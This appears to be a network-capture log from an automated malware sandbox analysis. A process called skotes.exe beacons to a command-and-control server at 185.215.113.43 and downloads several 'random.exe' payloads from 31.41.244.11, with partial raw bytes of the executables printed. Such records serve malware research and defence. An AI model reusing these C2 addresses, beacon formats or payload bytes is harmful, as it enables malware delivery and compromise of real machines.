1	192.168.2.5	49779	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:06.808270931 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:03:08.170073986 CET	1054	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 35 66 0d 0a 20 3c 63 3e 31 30 31 36 30 34 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 36 30 34 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 36 30 34 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 36 37 65 38 30 35 35 34 35 62 30 31 63 66 36 34 64 34 61 34 38 35 61 39 35 39 32 65 31 30 30 62 37 23 31 30 31 36 30 34 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 [TRUNCATED] Data Ascii: 35f <c>1016040001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1016041001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1016042001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#1016043001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbce71914e54a61cf64d4a485a9592e100b7#1016044001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1016045001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1016046001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1016047001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1016048001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7393574df141e542404358d6d9fc1d#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49783	31.41.244.11	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:08.296240091 CET	59	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 16, 2024 11:03:09.622318029 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:09 GMT Content-Type: application/octet-stream Content-Length: 727552 Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT Connection: keep-alive ETag: "67594bc0-b1a00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL$XgN,6@P\|z@ld8h4d.textAMN `.rdata<~`V@@.dataL@.rsrc@@.reloc@B.bss0@.bss@
Dec 16, 2024 11:03:09.622394085 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:09.622457981 CET	1236	IN	Data Raw: 89 c7 83 f8 0f 77 2c 90 89 7d c4 c7 45 c8 0f 00 00 00 57 ff 75 e0 8d 45 b4 50 e8 f4 36 00 00 83 c4 0c 01 ef 83 c7 b4 eb 77 66 2e 0f 1f 84 00 00 00 00 00 90 89 7d d8 83 cf 0f 83 ff 17 b9 16 00 00 00 0f 43 cf 81 ff ff 0f 00 00 c7 45 f0 01 00 00 00 Data Ascii: w,}EWuEP6wf.}CEMrA$PL#FfAP1u}}EEWuVx6E]5MMuEC]ry1tL1fDi[1i
Dec 16, 2024 11:03:09.622493982 CET	1236	IN	Data Raw: 00 e8 39 01 00 00 8b 45 e0 83 c4 04 eb 22 90 89 4d dc ff 15 c4 cc 41 00 8b 4d e0 90 89 4d dc 50 68 2d 9f 41 00 e8 15 01 00 00 8b 45 e0 83 c4 08 90 89 45 dc ff 75 d4 e8 39 6f 00 00 8b 75 e0 83 c4 04 90 0f b6 84 35 c4 fe ff ff 8b 55 d0 00 c2 0f b6 Data Ascii: 9E"MAMMPh-AEEu9ou5U5U5MU0BU9UuUEd0^_[]fUeE@EMPhAWEMj
Dec 16, 2024 11:03:09.622529030 CET	1236	IN	Data Raw: 45 d4 89 c3 83 e3 fc 83 e0 03 31 ff 83 f8 01 74 1e 83 f8 02 74 0e 83 f8 03 75 23 90 0f be 7c 1a 02 c1 e7 10 90 0f be 44 1a 01 c1 e0 08 31 c7 90 0f be 04 1a 31 f8 69 c0 95 e9 d1 5b 31 c6 8b 45 d8 83 f8 10 72 43 8d 50 01 81 fa 00 10 00 00 72 2a 90 Data Ascii: E1ttu#\|D11i[1ErCPr*MA) U$ffff.ERP1i[1TWMAEEAEEuuVHAuVH
Dec 16, 2024 11:03:09.622562885 CET	1236	IN	Data Raw: ff ff 6a 02 e8 5b 08 00 00 90 c7 45 dc 00 00 00 00 6a 06 e8 4c 08 00 00 83 c4 04 90 c7 45 f0 04 00 00 00 6a 01 e8 3a 08 00 00 83 c4 04 90 c7 45 f0 04 00 00 00 6a 05 e8 28 08 00 00 83 c4 04 90 c7 45 f0 04 00 00 00 6a 02 e8 16 08 00 00 83 c4 04 66 Data Ascii: j[EjLEj:Ej(EjfDUM]fff.UM]fff.Uu]Uu]U}u]e
Dec 16, 2024 11:03:09.622601986 CET	1236	IN	Data Raw: 83 62 04 00 52 50 e8 23 21 00 00 59 59 8b c6 5e c9 c2 04 00 55 8b ec 56 8b f1 8d 46 04 c7 06 44 60 41 00 83 20 00 83 60 04 00 50 8b 45 08 83 c0 04 50 e8 f7 20 00 00 59 59 8b c6 5e 5d c2 04 00 8d 41 04 c7 01 44 60 41 00 50 e8 42 21 00 00 59 c3 55 Data Ascii: bRP#!YY^UVFD`A `PEP YY^]AD`APB!YUVuLaA^]aaA A`AUVu`A^]UMhAEPUEM#P+w]Y[AQvRPPQE
Dec 16, 2024 11:03:09.622632980 CET	108	IN	Data Raw: d8 e8 1a fe ff ff 8d 45 14 8b ce 50 e8 0e fd ff ff 8d 4d 14 e8 07 fe ff ff 8b c6 e8 a1 07 00 00 c3 55 8b ec 83 ec 20 a1 00 e6 41 00 33 c5 89 45 fc 8b 45 10 56 83 ec 18 8b f1 8b cc 89 75 e0 89 75 e0 50 e8 68 fc ff ff ff 75 0c 8d 45 e4 ff 75 08 50 Data Ascii: EPMU A3EEVuuPhuEuPW$PMM
Dec 16, 2024 11:03:09.622670889 CET	1236	IN	Data Raw: 08 8b c6 8b 55 0c 89 4e 0c 8b 4d fc c7 06 c4 61 41 00 33 cd 89 56 10 5e e8 74 fa ff ff c9 c2 0c 00 55 8b ec 56 8b 75 08 57 56 8b f9 e8 a3 fa ff ff c7 07 c4 61 41 00 8b 46 0c 8b 56 10 89 47 0c 8b c7 89 57 10 5f 5e 5d c2 04 00 55 8b ec 56 8b f1 8d Data Ascii: UNMaA3V^tUVuWVaAFVGW_^]UVFD`APEYtjVYY^]j [AuEMPueEPuuMaAUVuNaA^],AUQuY
Dec 16, 2024 11:03:09.622705936 CET	1236	IN	Data Raw: 2c ff ff ff 7f 75 0a c7 41 2c fe ff ff 7f 32 c0 c3 b0 01 c3 55 8b ec 51 56 6a 00 6a ff ff 75 08 ff 15 6c cd 41 00 83 f8 ff 74 32 8b 75 10 85 f6 74 16 8d 45 fc 50 ff 75 08 ff 15 b4 cc 41 00 85 c0 74 1a 8b 45 fc 89 06 ff 75 08 ff 15 48 cc 41 00 f7 Data Ascii: ,uA,2UQVjjulAt2utEPuAtEuHAjX^%AUMhAEPU$jAtjY)AAAA5A=AfAfAfAfAf%Af-AA
Dec 16, 2024 11:03:09.742659092 CET	1236	IN	Data Raw: ff d6 eb 06 ff 15 f0 cc 41 00 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 8b 44 24 18 0b c0 75 18 8b 4c 24 14 8b 44 24 10 33 d2 f7 f1 8b d8 8b 44 24 0c f7 f1 8b d3 eb 41 8b c8 8b 5c 24 Data Ascii: AMdY^SVD$uL$D$3D$A\$T$D$ud$D$r;T$wr;D$vN3^[SD$uL$D$3D$3P\$T$D$ud$d$r;T$wr;D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49796	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:13.480089903 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 30 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016040001&unit=246122658369
Dec 16, 2024 11:03:14.833009005 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49800	31.41.244.11	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:14.955167055 CET	62	OUT	GET /files/unique1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 16, 2024 11:03:16.278450966 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:16 GMT Content-Type: application/octet-stream Content-Length: 4485120 Last-Modified: Mon, 16 Dec 2024 09:17:40 GMT Connection: keep-alive ETag: "675ff034-447000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 b1 4c 5d 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 e0 4b 00 00 64 71 00 00 32 00 00 00 e0 c3 00 00 10 00 00 00 f0 4b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 c4 00 00 04 00 00 7d 67 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f c0 6e 00 73 00 00 00 00 b0 6e 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 c0 c3 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 c0 c3 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL]g(Kdq2K@}gE@ _nsn n@(@.rsrcnP(@.idata nR(@ 9nT(@xtfxuijoV(@svksalgdJD@.taggant0"ND@
Dec 16, 2024 11:03:16.278500080 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:16.278526068 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:16.278543949 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:16.278559923 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: sq4T&P<cnQ]tPDO&
Dec 16, 2024 11:03:16.278577089 CET	448	IN	Data Raw: 24 c9 02 f2 1d 13 20 cb 7d a2 29 d9 58 af 5b 91 bf 86 ca c2 00 c5 f8 d7 18 63 d6 7a 14 f2 06 b1 ff 49 cd c0 61 52 81 40 cf 91 4c 7e 55 fc 57 7b af 61 90 bf af 0c 5f 70 d4 da 87 41 93 5b a8 96 08 1b d8 e4 48 60 a0 61 07 63 42 21 97 72 6f 2b 62 80 Data Ascii: $ })X[czIaR@L~UW{a_pA[H`acB!ro+bWyjD~dZL~Rrl"+w4~WG88g5Wj>9R,U9 }&=eWnoHaa3/Qk=6jY5r$w&-jvH;5
Dec 16, 2024 11:03:16.278598070 CET	1236	IN	Data Raw: 50 20 09 a7 cd 42 0b 03 75 9e 5d 1a 77 31 fc d8 07 91 9d 56 0f 80 4a f3 36 05 c8 16 1d f9 22 b2 b4 b5 30 a0 09 35 f6 8c 0c 60 86 b9 22 5f ae b8 a5 08 bb 0e c1 95 6c 42 b6 01 07 77 e4 ce ae b0 12 f3 af 4a 07 31 a8 06 11 25 27 70 e1 8c 3c c3 49 29 Data Ascii: P Bu]w1VJ6"05`"_lBwJ1%'p<I)c:nw`u&lrG56<}P^avx=HOJ\Z>6NnhI<lT%zNM?:[f+^W5[C%<pbRv6^(#-&2tL
Dec 16, 2024 11:03:16.278609037 CET	224	IN	Data Raw: cd 0f 9f 05 1f 08 b2 50 a0 49 4d 76 e5 77 bd 6f be dd b7 90 c0 8f b5 c5 57 e4 c6 b2 0c 35 9b 5a 28 56 bf 32 92 11 16 83 a5 19 00 de d7 e3 7c 38 17 74 0b ba 56 0a f9 0c 7c 76 d1 79 8b 19 c5 fb 17 e2 fe 6d 76 f4 4f 7f 84 58 1f 46 f8 f8 5d f4 a5 61 Data Ascii: PIMvwoW5Z(V2\|8tV\|vymvOXF]aB"=FV\|fQh]Pn- vu}5nWNq5}V^vwQ/5q}VyR:1IVSs
Dec 16, 2024 11:03:16.278624058 CET	1236	IN	Data Raw: 56 3d 09 8b 56 df d4 f6 b1 bc 06 37 f1 29 da f4 cc e3 07 de 0d 86 02 0f e2 a5 e1 03 3d f4 e0 d2 86 18 8f fd 20 e2 af 73 88 8e 6d f4 de c0 2e 9a f0 98 a8 09 3e c6 8d bf 9b 15 fb af ff 0f b1 77 0e 9b b6 7e 3f 72 d6 4a 32 92 16 f8 a5 9d 50 11 48 bd Data Ascii: V=V7)= sm.>w~?rJ2PH~:p-+ 3y^_o+4&p#5eZF:bOuOQeLPvfpwM65qn1HF\}MD`a4pwk`avu!X21
Dec 16, 2024 11:03:16.278642893 CET	1236	IN	Data Raw: e8 6a 7f 93 9e af 5a 6d 56 c5 1a 57 83 b3 1e c6 f4 d0 f1 92 40 19 7f 94 2a a9 aa d4 49 d4 2d 8f 6d 26 c6 1c 55 b3 00 cf fc da 6e f3 46 39 a8 89 6e 72 1b ca 05 d8 b3 d6 cb 04 ac 48 2a 11 8d d8 5a 22 df 1a 39 ee fa bb a5 71 1d c7 9b a8 1b a8 96 c6 Data Ascii: jZmVW@I-m&UnF9nrHZ"9q&U\|$+@XW-y\|O9`v`qb6zfxXtq^c`*2zfx}Sp'K+$mn1a>g
Dec 16, 2024 11:03:16.398905993 CET	1236	IN	Data Raw: b7 41 23 f3 67 a2 a6 96 1d 06 29 63 6f 6d c7 f7 cb 6b 40 29 0d 51 7c 6e 34 50 4e d2 c7 d2 c6 f2 13 91 6e a1 ed f3 a7 f7 a6 ca c7 49 4c fd bd ba 64 09 50 7a 13 75 1e 53 c2 08 3c 80 fe ef d6 a2 66 9e 63 b7 3e 96 58 c6 30 04 47 c1 59 1b fe 18 cb ff Data Ascii: A#g)comk@)Q\|n4PNnILdPzuS<fc>X0GYw8]?})( qLsqG.%XOpF8)i*zvYh8pW+"V9aop{vL+VV]AHLMT9UM{p&<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49827	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:25.693386078 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 30 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016041001&unit=246122658369
Dec 16, 2024 11:03:27.020872116 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49833	31.41.244.11	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:27.144210100 CET	61	OUT	GET /files/martin/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 16, 2024 11:03:28.470010042 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:28 GMT Content-Type: application/octet-stream Content-Length: 4434944 Last-Modified: Mon, 16 Dec 2024 09:16:00 GMT Connection: keep-alive ETag: "675fefd0-43ac00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0d 1b 5f 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 94 48 00 00 fc 74 00 00 32 00 00 00 f0 c5 00 00 10 00 00 00 b0 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 c6 00 00 04 00 00 1c 93 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 60 72 00 73 00 00 00 00 50 72 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 d7 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 d6 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_g(Ht2H@ D@ _`rsPr @r6(@.rsrcPrF(@.idata `rH(@ 08prJ(@ipikowml@:L(@bmxpstluC@.taggant0"C@
Dec 16, 2024 11:03:28.470107079 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:28.470165968 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:28.470205069 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:28.470242977 CET	896	IN	Data Raw: 76 b3 d0 df bb 31 87 e7 f6 28 3d 28 3b 83 f4 f0 a0 97 f4 f1 18 20 25 a8 d5 36 04 ab 2c aa cf 2d 9d 9b 93 8d 7e 6b 19 86 60 56 b1 9d 8d b3 9f d9 fa aa 16 03 bd 97 85 8c f7 21 c8 8c b9 2c f0 8a 18 18 40 0d 91 a3 33 71 45 e3 9c ed 5c 21 1e 97 43 27 Data Ascii: v1(=(; %6,-~k`V!,@3qE\!C'%Z1Ut,705NRtr-Vi_ x~hH2IOCmriC(,\.SP#Lb.,g.T8O6LXQB%w;jIm643+m-L!'"h_yH+mM
Dec 16, 2024 11:03:28.470278978 CET	1236	IN	Data Raw: 80 81 9f b0 03 4d f6 9c 25 6a 26 f9 a0 e6 0f 10 c4 03 af ce 33 26 a5 4c 3b bb 38 86 c1 d7 0c 0d f5 cb e6 14 4c 5f 1e 96 18 47 e3 82 43 61 74 b5 4e 37 16 06 85 da a8 48 af 60 15 38 93 d3 f4 75 10 21 9c e8 3e c5 b6 40 35 03 a7 fc 49 f7 a5 65 eb 5e Data Ascii: M%j&3&L;8L_GCatN7H`8u!>@5Ie^yeavX\|l3x?hrX".3>jlJt^s@t}m89?bL]C>-RLMakg;TwWA9r)f`P~lALvg#s`H)
Dec 16, 2024 11:03:28.470314980 CET	1236	IN	Data Raw: 80 d7 89 2d 56 e1 8c 2a ec a5 66 4b 2d 0c 3d 6c 7a a8 85 52 b9 af a6 d3 40 a6 db b7 15 4f 55 6d 18 23 bf 66 53 48 48 f2 a1 9e 89 05 fd 28 b8 d3 15 05 09 2e 18 30 cc f8 ed b7 22 1c bb 6d 8f 94 f0 32 b2 f1 c5 87 d1 63 d8 e5 3d 75 3b 21 0d 3c 24 ca Data Ascii: -V*fK-=lzR@OUm#fSHH(.0"m2c=u;!<$K31o!q?TS\|>-.Y'(l!QJ,Ge%43IMtYt8B\|%gtMB(S16l&hYI:_kT.f7]Pe
Dec 16, 2024 11:03:28.470372915 CET	1236	IN	Data Raw: 94 08 8a 8f fb a8 c9 c5 85 cb eb 76 7c 1d 71 eb 51 6b 85 18 d7 72 e1 6a b3 77 77 0c 72 73 8e f4 53 ae 31 fd 86 77 7b 00 e2 29 57 4a ba f7 19 c1 b4 61 d8 4a d1 a9 b6 81 bf 3b 49 86 41 77 56 6f 9d 7b 03 ad 79 65 98 79 82 1a d8 00 56 db cb 88 c5 a6 Data Ascii: v\|qQkrjwwrsS1w{)WJaJ;IAwVo{yeyVZH4hT8={'jR.k,Oxm'q +c7lDtHM+Qi{'}r\|m2.#+%HJe<<mHcMo"
Dec 16, 2024 11:03:28.470411062 CET	1236	IN	Data Raw: 63 2f a9 d9 74 47 06 0e 49 b0 a9 93 46 52 74 34 63 c2 86 dd 3c 33 a5 54 83 a8 e3 bf b5 79 b2 c6 70 6f 15 80 2d 30 07 a2 79 e7 86 2d 53 50 46 a6 5e ff d4 44 bb e2 2a 20 27 e0 23 cd d3 94 87 b0 bb d1 96 bd f3 58 f6 8a b0 db ad a7 4e 42 98 85 9d 30 Data Ascii: c/tGIFRt4c<3Typo-0y-SPF^D* '#XNB0De"-[(uL9vlx(_OPNF"J?zItmU2"Ov3;BD\|\|p l]GTp;#sc?dk0hat}(
Dec 16, 2024 11:03:28.470448017 CET	896	IN	Data Raw: a1 e3 82 dd 20 50 0c a9 24 22 0f e3 ee e3 ef ed 28 e2 60 34 dc fc 2d 4a 32 07 6e 26 5d 00 89 77 6f c7 67 21 1f f8 7f 23 41 cc b4 dd e4 5b 07 5c 02 40 7d 5b 2a 3f f8 3c bc 6d c3 a0 b3 58 77 62 4a 21 93 f6 6c 06 87 ea bf 5f 71 e1 78 0b fa 7b 61 08 Data Ascii: P$"(`4-J2n&]wog!#A[\@}[*?<mXwbJ!l_qx{a~a{H8WiaR1Cyt@pGX]_fMM<FgL:=3Mp\|,j/r\|@QegMF FBHmthU11u+srn=_
